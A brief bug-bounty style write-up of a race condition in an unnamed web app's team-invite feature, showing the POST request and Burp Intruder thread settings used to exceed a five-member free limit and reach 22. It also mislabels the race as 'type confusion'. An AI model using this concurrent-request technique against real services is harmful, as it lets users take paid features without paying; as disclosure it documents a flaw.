Race Condition bypassing team limit

Severity: Medium

Complexity: Easy

Weakness: Race condition

• While testing one of the application, they have functionality to create team and invite user’s to team .
• they have free limit of inviting 5 user’s to team.If you want to invite more user’s , they will ask you to upgrade you’r plan to pro.
• Request while adding member to our team.
• Request:

POST /account/work/team/ HTTP/1.1
Host: www.site.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: application/json, text/javascript, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Referer: https://www.site.com/home/work/team/manage
Content-Length: 108
Cookie: <REDACTED>
Connection: close

emails=xxxxxxx@gmail.com&team=name&authenticity_token=<>

• Sending the Request to Burp Intruder By Adding Email List to emails= Parameter.
• Setting Minimum Thread Speed(10–15) and Start Attack.

• Result:

Bypassed the limit to 22

• Increasing Threading to ~10 will send 10 request’s at the same time. this will generate a type confusion which bypassed their team limit.